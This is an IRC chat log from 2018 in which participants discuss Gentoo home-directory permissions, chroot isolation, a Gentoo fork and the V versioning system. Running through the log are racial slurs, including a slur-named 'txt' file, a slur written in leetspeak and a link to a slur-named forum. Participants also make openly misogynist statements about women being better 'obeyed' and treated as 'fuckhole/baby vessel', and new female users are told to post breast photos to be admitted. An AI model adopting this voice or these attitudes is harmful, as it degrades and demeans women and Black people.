1802924;1524107074;BingoBoingo;My impressions of the gentoo thus far are that is very much a "some assembly required" product. This has up and down sides which is why eventually we will need to specify something narrower than Gentoo. I look forward to musl'd up cuntoo. 1802925;1524107079;mod6;(which btw, I'm not saying the defaults are good, or bad, just typical across machines i've encountered) 1802926;1524107162;ascii_lander;mod6: most of /etc is 755 on account of being quite often read from userland as part of normal libcism 1802927;1524107166;mod6;(do a `ls -al ` to see the perms on the left most column, e.x. `ls -al /`) 1802928;1524107171;hanbot;everything, baby 1802929;1524107186;mircea_popescu;heh 1802930;1524107256;mircea_popescu;hanbot, quick solution is to restrict (and immutable) the directory right above the intended home. 1802931;1524107272;mircea_popescu;ie, chmod 700 chown root:user or somesuch. 1802932;1524107320;mircea_popescu;but usually you'd do something like chroot / jailshell them. 1802933;1524107492;*;mircea_popescu honestly thought this is the default, but apparently gentoo thinks /home should be 755. 1802934;1524107671;BingoBoingo;* mircea_popescu honestly thought this is the default, but apparently gentoo thinks /home should be 755. << Gentoo defaults are a strong case for a cuntoo split, even before getting into V and other Republican causes 1802935;1524108205;hanbot; hanbot, quick solution is to restrict (and immutable) the directory right above the intended home. << actually, if i do that, it tells me permission's denied to land in homedir ("Could not chdir to home directory /home/username/: Permission denied") and dumps me in... / 1802936;1524108213;mircea_popescu;ahahaha 1802937;1524108219;ascii_lander;BingoBoingo: classical gentoo, with its reliance on maxint external repos , is not long for this world. it'll be cuntoo or nuffin 1802938;1524108253;mircea_popescu;hanbot, well, don't go dropping credentials for "accounts" on that box lol. 1802939;1524108265;BingoBoingo;ascii_lander: At least we still have our cat. 1802940;1524108271;ascii_lander;verily 1802941;1524108280;mircea_popescu;srsly, who the fuck thought this is the way to do things. 1802942;1524108309;trinque;BingoBoingo: what cuntoo is there without v-portage 1802943;1524108328;BingoBoingo;Still, the audacity of the motherfuckers. After being given a perfectly servicable location with a cat. "What street" Oh, their cat is grey how unfortunate for them. 1802944;1524108340;trinque;v-portage is the whole thing. 1802945;1524108382;BingoBoingo;trinque: V-portage is the beef of it yes. Saner defaults can be the cheese. 1802946;1524108397;trinque;where are those sane defaults going to live? 1802947;1524108426;trinque;portage isn't a proggy on gentoo; it is gentoo. 1802948;1524108428;mod6;hanbot: I can help, what are you trying to achieve? Changing /home/username from chmod 755, to chmod 700? 1802949;1524108487;BingoBoingo;!!up tidbitnipply 1802950;1524108488;deedbot;tidbitnipply voiced for 30 minutes. 1802951;1524108500;tidbitnipply;Boing 1802952;1524108516;BingoBoingo;tidbitnipply: Who is your daddy and what does he do? Also how is your cold tolerance? 1802953;1524108523;tidbitnipply;🙃 1802954;1524108523;trinque;default perms might be in baselayout, or might be in whatever dumps out useradd 1802955;1524108545;tidbitnipply;He is retired 1802956;1524108718;tidbitnipply;I was told to look for mp? 1802957;1524108726;tidbitnipply;Is he around 1802958;1524108750;BingoBoingo;tidbitnipply: He should wake up in the next 24 seconds or 24 hours 1802959;1524108784;BingoBoingo;None may know the timing of the MP... except maybe hanbot... And the idaho girlie... And... 1802960;1524108800;trinque;tell you what, this is why danielpbarron says no women talking in church. 1802961;1524108808;tidbitnipply;LOL 1802962;1524108821;tidbitnipply;Oh please, he wouldn't tell me that in person 1802963;1524108833;trinque;because you're a woman right, and therefore. 1802964;1524108839;ascii_lander;not only would say, but would gag 1802965;1524108868;tidbitnipply;He would be weak at the knees 😍 1802966;1524108900;BingoBoingo;I have yet to meet danielpbarron, but... Knees of iron 1802967;1524108954;*;trinque already had his fuck for the night. knees are just fine. 1802968;1524108999;tidbitnipply;What century is he stuck in? 1802969;1524109011;BingoBoingo;tidbitnipply: The 23rd 1802970;1524109021;BingoBoingo;Pure relic of the future 1802971;1524109029;trinque;anyhow, we were discussing cuntoo? 1802972;1524109052;trinque;much as being born with a pair of tits is astonishing 1802973;1524109070;trinque;tidbitnipply: wait quietly and I'm sure he'll be around sometime 1802974;1524109096;tidbitnipply;I will wait like a good girl not to disturb mr Daniel 1802975;1524109099;BingoBoingo;trinque: Vortage is the big sell, but saner user toileting defaults could also make it in. Because ain't nobody got time fo dat. 1802976;1524109111;trinque;BingoBoingo: once there's a decent thread on base packages, I'll have a target for minimal set of packages in cuntoo repo, and we can get rolling 1802977;1524109139;BingoBoingo;Sweet 1802978;1524109174;BingoBoingo;trinque: Anyways shit like adduser defaults, why dhcpd started on default boot, etc 1802979;1524109222;BingoBoingo;The systemd-isms poison the readability of a lot of useful gentoo problem solution flovored docs 1802980;1524109228;trinque;lemme see what I already sawed off in a chroot on worldeater (plattered RAID box, to be cuntoo distfiles server) 1802981;1524109239;ckang;uggh, systemd makes me sad 1802982;1524109256;ckang;having to deal with systemd and initd just makes me angry 1802983;1524109271;BingoBoingo;Stahp hitting yourself ckang 1802984;1524109274;*;trinque is willing to go as far as busybox, with mdev, and if you need anything else, you slam down a chroot and do your dirties there 1802985;1524109291;trinque;might be too far, and might severely break portage more than we want to fix at the moment 1802986;1524109346;ckang;The editing of init scripts to change run levels, PITA 1802987;1524109357;ckang;im not sure how to do it otherwise though 1802988;1524109362;trinque;gentoo ships with openrc, and I have nothing bad to say about it 1802989;1524109383;trinque;swapping init is gonna make porting over ebuilds a little harder, which isn't a reason to avoid it by itself, but is a cost. 1802990;1524109391;ckang;not touched gentoo for some...hmmm...god probably 12 years? 1802991;1524109473;ckang;we use RHEL at work and i use debian at home 1802992;1524109487;trinque;k but this isn't a discussion of our favorite distros 1802993;1524109513;ckang;true, but they are all broken thats for sure 1802994;1524109542;ckang;my biggest but dumbest peeve about systemd is the order of the action command 1802995;1524109555;ckang;systemctl stop 1802996;1524109584;ckang;then to start, have to jump over a word and edit, small but still sorta boils my blood every time 1802997;1524109590;trinque;rest assured nobody's bringing systemd, dbus, pulseaudio, et al, alive 1802998;1524109608;ckang;lol pulseaudio 1802999;1524109623;BingoBoingo;OSS or nothing 1803000;1524109633;ckang;i think the most hated driver back in the day when i was dealing with desktop linux was ATI 1803001;1524109640;trinque;I mean alsa's got a mixer, "dmix" 1803002;1524109643;trinque;it was never needed 1803003;1524109694;BingoBoingo;Fuck alsa. OSS 1803004;1524109736;*;ascii_lander mercilessly ripped audio & gpu out of the rockchip kernel build. because wai. 1803005;1524109738;trinque;it's a kernel decision anyway, I don't care to make it in either direction. server doesn't need sound 1803006;1524109742;trinque;aha 1803007;1524109776;ckang;whats this rockchip yall keep speaking of? 1803008;1524109786;ckang;context sounds like a CPU or a device 1803009;1524109788;ckang;but cant tell 1803010;1524109820;trinque;arm board 1803011;1524109834;ckang;oh like a devkit? 1803012;1524109835;BingoBoingo;* ascii_lander mercilessly ripped audio & gpu out of the rockchip kernel build. because wai. << I am going to have to introduce the word "flensing" to the venezolana en Viernes 1803013;1524109855;BingoBoingo;To describe what kind on ingenero eres 1803014;1524110030;ckang;heh, so many chinese SoC 1803015;1524110038;ckang;how libre are they with documents? 1803016;1524110071;BingoBoingo;ckang: They are the least closed of the candidates considered so far 1803017;1524110088;ckang;ahh, im looking at you broadcom 1803018;1524110124;BingoBoingo;Any deets on what put them in your niggers.txt file? 1803019;1524110156;ckang;lol, they dont come off a lot of stuff, NDAs and such required 1803020;1524110164;ckang;qualcomm is the same 1803021;1524110194;ckang;and unless you are buying bulk, they wont pay attention 1803022;1524110215;mircea_popescu;so she managed 500 lines but still no "hey, i'm here to show my tits" huh. 1803023;1524110217;mircea_popescu;dat coy reflex. 1803024;1524110243;BingoBoingo;Coy as a Koi 1803025;1524110274;ckang;tidbitnipply: ^ 1803026;1524110288;tidbitnipply;Hello 1803027;1524110299;ckang;lol 1803028;1524110303;ckang;!!up tidbitnipply 1803029;1524110304;deedbot;tidbitnipply voiced for 30 minutes. 1803030;1524110326;tidbitnipply;Here to show my tits 1803031;1524110371;mircea_popescu;tidbitnipply, 478b80dc. 1803032;1524110380;tidbitnipply;Ty 1803033;1524110386;ascii_lander;ckang: the full (by all indications) set of datashits for rockchip, is on their www. schem for the board is on board maker's www 1803034;1524110477;mircea_popescu;ckang, http://btcbase.org/log/2018-04-03#1792521 1803035;1524110477;a111;Logged on 2018-04-03 18:27 asciilifeform: ROC-RK3328-CC ( currently building a kernel for it, without the 'evil' periphs ) 1803036;1524110477;ascii_lander;ckang: it isn't the only reasonable chinese armtron -- there is also, e.g., 'allwinner' 1803037;1524110508;ascii_lander;and 'marvell' (of 'pogo' fame) also 1803038;1524110512;ascii_lander;and possibly a few other 1803039;1524110536;ascii_lander;i picked 'rockchip' for pilot plant because it wins on price/form factor/nic 1803040;1524110539;ckang;allwinner im familiar with, used one of their SoC boards before 1803041;1524110579;ckang;im over them though 1803042;1524110603;BingoBoingo;I have to say, ascii_lander's visit to this planet was very good for the morale. It puts into perspective that My experience with the orcs is what he has been suffering since landing in the EE.UU big prison 1803043;1524110746;mod6;I'm happy to hear. 1803044;1524110910;BingoBoingo;ascii_lander: however can confirm the venezolana that does the language lessons is not a fever dream and does exist 1803045;1524111140;ascii_lander;not only exists, but serious grade-a specimen 1803046;1524111172;mod6;hottie huh 1803047;1524111301;*;ascii_lander to bed, bbl 1803048;1524111720;tidbitnipply;https://usercontent.irccloud-cdn.com/file/74RkS9qs/image.jpg 1803049;1524112073;ckang;!!up elevatedgal 1803050;1524112073;deedbot;elevatedgal voiced for 30 minutes. 1803051;1524112171;BingoBoingo; hottie huh << Seriously alive in the head, a rarity in the land of mate crack pipe lead solder poisoning 1803052;1524112193;ckang;down with RoHS! 1803053;1524112227;mircea_popescu;!!pay tidbitnipply 0.02 1803054;1524112235;deedbot;Get your OTP: http://p.bvulpes.com/pastes/hb8Yh/?raw=true 1803055;1524112373;elevatedgal;Here to show breasts 1803056;1524112520;mircea_popescu;elevatedgal, 0a72a045 1803057;1524112559;mircea_popescu;sounds like alf actually had a ball in uruguay huh. 1803058;1524112607;trinque;ckang: listen, why don't you do this all at once. I'm just about to fire off 12 and you bring in two more. 1803059;1524112636;trinque;line 'em the fuck up and let them get their brand and be done for the day 1803060;1524112638;ckang;lol 1803061;1524112647;trinque;not lol, this is a human powered cold storage over here. 1803062;1524112651;ckang;because they are complicated and finicky 1803063;1524112651;trinque;and I have other things to do 1803064;1524112657;trinque;who gives a shit what women are! 1803065;1524112751;ckang;danielpbarron doesnt ;p 1803066;1524112939;ckang;i noticed things are more pleasant when they arent upset though 1803067;1524112984;trinque;did you ever plan on doing anything productive here, or is this it? 1803068;1524113015;ckang;if you have any projects and it fits my skillset i would be happy to take a stab 1803069;1524113050;ckang;what do you need done? 1803070;1524113351;trinque;have you built your own trb node? used V? understood it? do you have a working gnat? built asciilifeform's ffa? built diana_coman's eucrypt? stood up a gentoo from scratch? fertile ground all over. 1803071;1524113395;ckang;ive done linux from scratch way back in the day 1803072;1524113426;ckang;the rest are foreign terms to be at the moment 1803073;1524113462;trinque;maybe do some reading of the relevant blogs then. 1803074;1524113521;ckang;definitely an interesting mix of people here though 1803075;1524113536;trinque;then when my finger's hovering over the negrate button I'll have something to think about besides "brings in narcissistic nothing-holes that talk too much" 1803076;1524113536;ckang;different from the other chans ive been in 1803077;1524113558;ckang;im the type i simply need direction 1803078;1524113575;ckang;i can figure most things out if its centered around a specific goal or doing something 1803079;1524113650;trinque;alright, stand up a gentoo, and actually learn how portage works, so you can help scrape ebuilds into cuntoo 1803080;1524113661;trinque;appropriate right, you're the guy with the endless flood of dumb cunts 1803081;1524113747;ckang;lol gentoo is out of my element but nothing i cant figure out, ive built/maintained package repos on rhel/centos and apt 1803082;1524113789;ckang;i imagine ebuilds are like makefiles but more package level? 1803083;1524113801;ckang;brew recipe etc 1803084;1524113812;trinque;yep 1803085;1524113846;trinque;package metadata and build/install commands 1803086;1524113866;ckang;whats cuntoo btw? lol 1803087;1524113938;trinque;the republic's confiscated gentoo 1803088;1524113950;ckang;heh pre-systemd? 1803089;1524113976;trinque;consists of an ebuild tree managed by the republic's versioning system, V, and a self-reproducing script 1803090;1524113981;ckang;seems like a bunch of distros have forks now resisting the switch 1803091;1524113988;ckang;im not finding much on V 1803092;1524113996;ckang;what the context? 1803093;1524113997;trinque;so rather than pulling someone's blessed stage3 every time you want to build one, you extract a cuntoo from your existing one 1803094;1524114041;trinque;ckang: http://cascadianhacker.com/07_v-tronics-101-a-gentle-introduction-to-the-most-serene-republic-of-bitcoins-cryptographically-backed-version-control-system << read up 1803095;1524114063;ckang;crap elevatedgal has been msg'ing me trying to figure out how to upload 1sec 1803096;1524114080;trinque;make her wait 1803097;1524114117;ckang;hmm so its like a patch ? 1803098;1524114128;ckang;but for many things? 1803099;1524114169;ckang;oh hashed 1803100;1524114173;ckang;hm 1803101;1524114254;trinque;it is a signed tree of patches which explicitly call out the hashes of the antecedents, the items to be patched 1803102;1524114260;ckang;actually this is going to take a minute to understand... 1803103;1524114268;ckang;more to it than i thought 1803104;1524114284;trinque;sure, enjoy and read. 1803105;1524114338;ckang;yall should recruit terry :) hes a bit crazy but a very skilled programmer 1803106;1524114352;ckang;on the old school stuff too 1803107;1524114367;trinque;and dwell on that for extant portage, I cannot look at it and know who's responsible for that particular damned line in that ebuild. 1803108;1524114405;trinque;can go find wherever they had it in a git repo somewhere else, if I'm lucky, but here, who's responsible, what they did, and to what, crystallized right before the operator. 1803109;1524114444;ckang;hopefully they did it right then 1803110;1524114458;ckang;or on the right path anways.. 1803111;1524114471;trinque;which terry anyhow, terry davis? 1803112;1524114475;ckang;yea 1803113;1524114479;trinque;lol 1803114;1524114481;ckang;poor guy 1803115;1524114497;ckang;guess hes homeless in san diego now 1803116;1524114511;trinque;!#s terry davis 1803117;1524114511;a111;30 results for "terry davis", http://btcbase.org/log-search?q=terry%20davis 1803118;1524114573;trinque;http://www.loper-os.org/?p=46 << here he is commenting on alf's blog 1803119;1524114603;ckang;hahah 1803120;1524114606;ckang;that 1st comment 1803121;1524114695;ckang;hes an interesting character for sure, very smart but also pretty crazy 1803122;1524114779;ckang;last i heard, his sister told him to take meds or leave, he left to SD, his van got tickets and was impounded leaving him homeless 1803123;1524114849;ckang;1 sec gonna help elevatedgal real fast 1803124;1524115332;ckang;!!up elevatedgal 1803125;1524115333;deedbot;elevatedgal voiced for 30 minutes. 1803126;1524115352;elevatedgal;https://usercontent.irccloud-cdn.com/file/YzrJJvb6/image2.jpg 1803127;1524115378;elevatedgal;Head got cut but have another 1803128;1524115406;elevatedgal;https://usercontent.irccloud-cdn.com/file/RpCgjFfR/image.jpg 1803129;1524115530;mircea_popescu;http://btcbase.org/log/2018-04-19#1803058 << nah, that's not the dao, you'll drive yourself mad. just do the 12, let the others wait for next batch. 1803130;1524115530;a111;Logged on 2018-04-19 04:36 trinque: ckang: listen, why don't you do this all at once. I'm just about to fire off 12 and you bring in two more. 1803131;1524115532;mircea_popescu;experience speaks. 1803132;1524115569;trinque;has as much to do with how much log these dummies are taking up 1803133;1524115583;mircea_popescu;now there is that. 1803134;1524115587;BingoBoingo;http://btcbase.org/log/2018-04-19#1803057 << That is my impression. We outwalked his choice of footwear however 1803135;1524115587;a111;Logged on 2018-04-19 04:35 mircea_popescu: sounds like alf actually had a ball in uruguay huh. 1803136;1524115591;trinque;ckang here scurries off in a cuntoo thread because oh, gotta serve the woman 1803137;1524115629;mircea_popescu;and i mean look at the weird shit. elevatedgal what are you doing with that hand ? explain it to me, are you saving on nipple or what is it ? 1803138;1524115672;elevatedgal;I was just touching it, not trying to hide 1803139;1524115703;BingoBoingo;http://btcbase.org/log/2018-04-19#1803066 << This is how YOU get fucked. Girls just want to feel, aite? What they feel isn't important. That they feel is. 1803140;1524115703;a111;Logged on 2018-04-19 04:42 ckang: i noticed things are more pleasant when they arent upset though 1803141;1524115727;mircea_popescu;right. half a face and half a this and half a that and so on. elevatedgal do it properly. 1803142;1524115759;mircea_popescu;http://btcbase.org/log/2018-04-19#1803068 << except you won't say wtf you've done. and without some kind of a bio nobody's going to have much to say to you, because on what basis would they. 1803143;1524115759;a111;Logged on 2018-04-19 04:43 ckang: if you have any projects and it fits my skillset i would be happy to take a stab 1803144;1524115803;ckang;well i don't want to limit myself to only things ive done 1803145;1524115836;ckang;i can learn new stuff, but there needs to be some interest in the subject for me to dive deep and enjoy it 1803146;1524115864;hanbot; hanbot: I can help, what are you trying to achieve? Changing /home/username from chmod 755, to chmod 700? << i want to make a user whose access is entirely limited to one specific dir. i'm fed up for the night tho', will be back at it tomorrow evening if you still feel philanthropic then 1803147;1524115865;mircea_popescu;that's not how it works. you're not in control in any sort of meaningful sense, it's not that you're limiting yourself or aren't limiting youself. with a history people can say meaningful things to youi ; without, they can't. that's pretty much the whole story. 1803148;1524115924;hanbot;BingoBoingo> None may know the timing of the MP... except maybe hanbot... And the idaho girlie... And... << i must regret to inform i have no MP clock, no MP clock at all! 1803149;1524115950;BingoBoingo;ckang: I will lend you a +1 rating for a resume, life story, and a picture of a sharpie in your pooper with the string n3gg34Z on your cheeks 1803150;1524115952;ckang;yea, understandable, ive just been trying to soak things in up until this point, a lot of the stuff you speak about id need to look into further because i wont even pretend to have any idea on 1803151;1524115962;mircea_popescu;ckang, not like there's any rush. 1803152;1524115962;trinque;ahaha 1803153;1524115973;ckang;BingoBoingo: lol sharpie 1803154;1524115978;mircea_popescu;but when i say "hey x, how about you do y" it's based on my understanding of x's history, not something else. 1803155;1524115984;ckang;are buttsharpies a thing still? 1803156;1524115993;BingoBoingo;ckang: There is history there. 1803157;1524115996;trinque;guy's totally open to it, look 1803158;1524116005;*;trinque puts that in the ckang HISTORY file 1803159;1524116006;ckang;haha no no, didnt say that 1803160;1524116012;mircea_popescu;lmao. 1803161;1524116016;ckang;ive been poked with a finger 1803162;1524116022;ckang;and that sent me about a foot up 1803163;1524116023;mircea_popescu;!#s THE STAIN, IT REMAINS 1803164;1524116023;a111;0 results for "THE STAIN, IT REMAINS", http://btcbase.org/log-search?q=THE%20STAIN%2C%20IT%20REMAINS 1803165;1524116025;ckang;unexpected 1803166;1524116032;BingoBoingo;ckang: What makes your pooper so special? Petroleum jelly is a thing 1803167;1524116036;mircea_popescu;i coulda swore we had that in there. 1803168;1524116063;ckang;BingoBoingo: i suppose, up until this point its been unidirectional 1803169;1524116091;ckang;i mean thats what may separate it from other anus' (not necessarily yalls) 1803170;1524116105;BingoBoingo;ckang: That leaks information. You never tried out for the wrestling team! 1803171;1524116113;BingoBoingo;*wrasslin' 1803172;1524116115;ckang;checking the oil ? 1803173;1524116116;ckang;lol 1803174;1524116144;ckang;but no, never wrestled, played ice hockey instead 1803175;1524116161;mircea_popescu;that's one thing you got in common with mod6 then. 1803176;1524116164;BingoBoingo;Ouch, that's awfully square 1803177;1524116168;mircea_popescu;http://btcbase.org/log/2018-04-19#1803105 << which terry is this ? davis ? 1803178;1524116168;a111;Logged on 2018-04-19 05:05 ckang: yall should recruit terry :) hes a bit crazy but a very skilled programmer 1803179;1524116184;ckang;mircea_popescu: yea, danielpbarron reminded me of him slightly 1803180;1524116191;mircea_popescu;!#s templeos 1803181;1524116192;a111;46 results for "templeos", http://btcbase.org/log-search?q=templeos 1803182;1524116210;BingoBoingo;hanbot: There was one week where Qntra and Trilema had a weird menstrual sync going on 1803183;1524116290;trinque;https://archive.is/dzLAi << "You will talk with God and have daily prayer. Eventually, you will kill." 1803184;1524116290;mircea_popescu;http://btcbase.org/log/2018-04-19#1803122 << sad. i thought he had his own place for some reason. 1803185;1524116290;a111;Logged on 2018-04-19 05:12 ckang: last i heard, his sister told him to take meds or leave, he left to SD, his van got tickets and was impounded leaving him homeless 1803186;1524116307;trinque;latest templeos.org; I can empathize with that 1803187;1524116314;ckang;mircea_popescu: his parents kicked him out for being a bit racist 1803188;1524116319;ckang;and its been downhill since 1803189;1524116363;ckang;was living in a van for some months, then he lost the van. 1803190;1524116366;mircea_popescu;"We live in a castrated dog oppressed world with way too many hellish dog catchers." 1803191;1524116381;trinque;guy's probably fine and just genuinely hates everyone enough to have gotten weird not communicating. 1803192;1524116393;BingoBoingo;Yo esperando por una foto. ckang when will you stop projecting onto Terry and address your own coyness? 1803193;1524116408;ckang;coyness about what? 1803194;1524116408;mircea_popescu;"King Terry is, now, recruiting the Original Catholic brand Templar Knights. Send email to tdavis@templeos.org." 1803195;1524116424;BingoBoingo;ckang: Your story and your pooper 1803196;1524116427;mircea_popescu;BingoBoingo, you soy esperando una / espero una. no por and verbs change in spanish! 1803197;1524116428;ckang;haha 1803198;1524116446;mod6;<+ckang> but no, never wrestled, played ice hockey instead << right on :] 1803199;1524116448;ckang;i can tell you about the time a finger got poked into it if you really want 1803200;1524116458;ckang;but didnt think you wanted to hear that 1803201;1524116506;mircea_popescu;Visit the TempleOS chat room. << holy shit, he got an irc now ? 1803202;1524116510;ckang;or well, ive never been asked to expand on it past that point.. 1803203;1524116513;mircea_popescu;come on, there's no fucking way he's not been reading the logs. 1803204;1524116515;ckang;yea, rizon 1803205;1524116526;ckang;horrible net but, he pops in and out all the time 1803206;1524116572;ckang;terry would put in 48hr marathons i bet, given he had power and a place to sleep 1803207;1524116592;ckang;i heard his stuff may have gotten stolen, he was making vids again for a bit 1803208;1524116622;mod6;hanbot: ok we can tackle it tomorrow 1803209;1524116653;BingoBoingo; BingoBoingo, you soy esperando una / espero una. no por and verbs change in spanish! << Finger speed conjugation is still a work in progress. The locals feed me bad grammar habits the Venezolana has to correct. The accent however is servicable. Alf can elaborate when he has report time. 1803210;1524116677;mircea_popescu;heh voat is down. anyway, apparently it's not his chan, but theirs. 1803211;1524116683;mircea_popescu;https://voat.co/v/Niggers/912231 1803212;1524116692;ckang;here 1sec ill find it 1803213;1524116709;mircea_popescu;http://www.templeos.org/Videos/Dianna/LifeAsWife.mp4 in other lulz. 1803214;1524116760;ckang;its irc.rizon.net #templeos 1803215;1524116773;ckang;hes comes in to use the bot for scripture 1803216;1524116864;mircea_popescu;ckang, his own page linked #chimpire 1803217;1524116890;ckang;haha, guess he was trolling, or he recently moved 1803218;1524116916;ckang;ive only seen him pop into #templeos but its been a few months, he may have changed 1803219;1524116920;danielpbarron;http://btcbase.org/log/2018-04-19#1802962 << i would, and have http://danielpbarron.com/2018/banned-from-the-rabbit-hole/ 1803220;1524116920;a111;Logged on 2018-04-19 03:33 tidbitnipply: Oh please, he wouldn't tell me that in person 1803221;1524116945;BingoBoingo;danielpbarron: When are you visiting the oriental republic? 1803222;1524116971;danielpbarron;probably not soon 1803223;1524116993;BingoBoingo;You'd probably be well off waiting till december 1803224;1524117034;BingoBoingo;If you want Brasileras. Or second half of January if you want Jew gurlz. 1803225;1524117071;mircea_popescu;danielpbarron, so, are you getting ordained in the true church ? 1803226;1524117210;danielpbarron;ordained as what? 1803227;1524117229;mircea_popescu;they have some kind of priesthood no ? 1803228;1524117235;danielpbarron;nope 1803229;1524117240;danielpbarron;we are all saints 1803230;1524117287;danielpbarron;there could be a leader but he has to have exactly 1 wife, and at least one child all of whom must believe 1803231;1524117329;ckang;hmm, so to be in your church guys need to let their wives fuck the leader? 1803232;1524117340;danielpbarron;at least 2 children, i mispoke 1803233;1524117343;mircea_popescu;so your plan for the ~rest of your life is to sit on a patch of dirt in ok and basically wait ? 1803234;1524117363;danielpbarron;ckang, no! that would be adultery 1803235;1524117373;ckang;before they are married ? 1803236;1524117385;ckang;ohhh 1803237;1524117393;ckang;they will have 2 children 1803238;1524117411;ckang;but the "one child all of whom must believe" thing 1803239;1524117427;ckang;i read as 'one child with all who believe' 1803240;1524117444;mircea_popescu;ohohoh. saucy. 1803241;1524117465;mircea_popescu;"you can only be the leader if you have a child with everybody!" 1803242;1524117475;ckang;lol poor guy 1803243;1524117484;mircea_popescu;https://archive.is/VmPBG in other lulz. 1803244;1524117493;danielpbarron;mircea_popescu, my plan is to serve God, other than that idk 1803245;1524117494;ckang;queen bee situation 1803246;1524117578;trinque;mircea_popescu: the patch of dirt and wait was exactly my idiot mother's plan 1803247;1524117591;mircea_popescu;works a LOT better for women. 1803248;1524117605;trinque;rapture's coming, what's there to do but be PURE until we ascend 1803249;1524117614;trinque;women work a lot better when not listened to 1803250;1524117654;mircea_popescu;well, the pure sort, certainly. 1803251;1524117664;ckang;a mute would be ideal ? 1803252;1524117680;ckang;or do you want them to be able to speak sometimes 1803253;1524117739;trinque;I speak to my woman all the time; brain parts and mouth parts work fine 1803254;1524117743;ckang;lol just noticed, 1:37 AM f u all 1803255;1524117752;mircea_popescu;aww. 1803256;1524117774;ckang;can we get them without emotion too trinque ? 1803257;1524117790;trinque;I think mircea_popescu is the one to talk to about that firmware upgrade 1803258;1524117799;mircea_popescu;me ?! 1803259;1524117808;trinque;no? 1803260;1524117848;mircea_popescu;i write fucking poetry ffs! 1803261;1524117859;ckang;so would a 'fuckhole/baby vessel' best describe your ideal woman ? 1803262;1524117865;trinque;lol! 1803263;1524117870;ckang;oh and /cleaning machine 1803264;1524117879;ckang;;p 1803265;1524117898;trinque;maybe I should've said "obeyed" instead of "listened to" 1803266;1524117912;*;trinque ftr has no babies. 1803267;1524117942;ckang;my sister has 2 inside her now, her 1st pregnancy 1803268;1524117987;ckang;and they are huge apparently for their age but the last 8 weeks they gain 1lb/week 1803269;1524117997;*;ckang glad hes not her 1803270;1524118047;mircea_popescu;twins rarely reach 3kgs each (which is the normal weight of humans at birth). so more like 5ish. 1803271;1524118070;*;trinque 's stepmom had twins, looks downright miserable 1803272;1524118081;ckang;they are 4lbs now 1803273;1524118094;ckang;I was an ounce shy of 10lb 1803274;1524118102;ckang;so maybe somewhere around that 1803275;1524118181;ckang;fortunately shes 6' so they have some extra space 1803276;1524118209;trinque;anyhow I don't think much about the ideal woman, people don't come that way 1803277;1524118215;mircea_popescu;dude check out that place, they supersized babies also. 1803278;1524118228;trinque;gotta be either that they're coming out fat, or the hormones 1803279;1524118238;trinque;non-exclusive or 1803280;1524118251;mircea_popescu;anyway, macrosomia is a serious health risk. mostly for the mother, but not really great for the baby either. 1803281;1524118265;ckang;oh not fat, i was a tall baby though 1803282;1524118290;ckang;yea they said twins are more likely to come early so any day/week now almost 1803283;1524118328;trinque;my noggin got stuck, did some damage on my way down the chute 1803284;1524118356;mircea_popescu;trinque, shoulders, no ? 1803285;1524118357;trinque;evolution didn't give a damn when standing upright came along. 1803286;1524118362;ckang;they didnt even try on me apparently, doctor told her the shoulders wouldnt fit through 1803287;1524118379;trinque;nah, I'm told my head wasn't as squashy as they often are 1803288;1524118387;mircea_popescu;ahahaha 1803289;1524118388;ckang;lol 1803290;1524118399;mircea_popescu;this, my dear friend, MAY BE USED AGAINST YOU IN THE FUTURE 1803291;1524118418;trinque;ahaha youdontsay.jpg 1803292;1524118640;ckang;thankfully i will never get to experience passing a 10lb child out from my insides 1803293;1524118748;*;trinque would collect a whole household full of women like the girl he has now 1803294;1524118766;trinque;and yeah ckang, she talks to me even 1803295;1524118785;trinque;but NOT ABOUT HER 1803296;1524118803;ckang;ah thats good lol, would be pretty awkward if she didnt, for me anyways 1803297;1524118832;trinque;I dunno, we sit in silence and read too 1803298;1524118856;ckang;yea thats healthy, being comfortable with silence 1803299;1524118860;ckang;many arent 1803300;1524119047;*;trinque -> bed 1803301;1524119070;ckang;nn 1803302;1524130930;spyked;huh, almost missed http://btcbase.org/log/2018-04-18#1802081 <-- thank you! will toast wine from ol' family vine later to honour this. 1803303;1524130930;a111;Logged on 2018-04-18 17:10 mircea_popescu: there we go. mazel tov ; and spyked ave1 lobbes permit me to congratulate you an' to wish you long&happy tenure. 1803304;1524131195;spyked;http://btcbase.org/log/2018-04-19#1802891 <-- /me would love to, but is short on coin atm. will weigh this again in a few months from now if still available. and I still wanna buy a board for home too, to check out the hardware. 1803305;1524131195;a111;Logged on 2018-04-19 02:50 mircea_popescu: iirc spyked was getting one too 1803306;1524133073;spyked;http://btcbase.org/log/2018-04-19#1802935 <-- iirc execute bit on $dir toggles whether {user,group,others} can "search" (i.e. chdir to) $dir or access other files within, including other dirs, making this a recursive thing. so this explains the chdir error. 1803307;1524133073;a111;Logged on 2018-04-19 03:23 hanbot: hanbot, quick solution is to restrict (and immutable) the directory right above the intended home. << actually, if i do that, it tells me permission's denied to land in homedir ("Could not chdir to home directory /home/username/: Permission denied") and dumps me in... / 1803308;1524133461;spyked;http://btcbase.org/log/2018-04-19#1803146 <-- this is (nearly?) impossible to achieve within the Unix access control model. it's easy to express "no one but user1 has access to dir1", but no reasonable way of expressing the reverse, i.e. "user2 can access only dir2". must be one of the reasons why namespaces and cgroups were added to Linux 1803309;1524133461;a111;Logged on 2018-04-19 05:31 hanbot: hanbot: I can help, what are you trying to achieve? Changing /home/username from chmod 755, to chmod 700? << i want to make a user whose access is entirely limited to one specific dir. i'm fed up for the night tho', will be back at it tomorrow evening if you still feel philanthropic then 1803310;1524133775;spyked;also, kinda what got me thinking about the whole "general-purpose os" thing a while ago. POSIX ACL wasn't designed to be very flexible, it assumes some level of trust in the processes running on the box (the Unix notion of "user" is attached to processes, while that of "permission" is tied to files) 1803311;1524136522;ckang;but, SELinux :( 1803312;1524136619;ckang;what are you trying to do exactly? 1803313;1524138285;ckang;you can do the user limited to one dir but it would require chroot + copy of binaries or a R/O mount of the binaries linked inside but that shit gets messy 1803314;1524138332;ckang;nowadays with docker and such its way easier to spin something up thats isolated and getting the networking control for the container 1803315;1524152377;mod6;mornin' TMSR~ 1803316;1524152519;lobbes;mornin' mod6 1803317;1524152550;mod6;How goes today lobbes? 1803318;1524152621;lobbes;ah can't complain. Trying to get logbot up and running (was able to successfully press the ircbot genesis and test it on my local machine the other night) 1803319;1524152727;mod6;Ah good! Resolved that seal issue then? 1803320;1524152761;lobbes;I did! Was simple as removing the robots.txt from .seals. btw I love the manual you included with yer vtron 1803321;1524152777;lobbes;very useful for noobs like me to figure out wtf I'm doing 1803322;1524152791;mod6;(for ref: http://btcbase.org/log/2018-04-14#1799100) 1803323;1524152791;a111;Logged on 2018-04-14 20:26 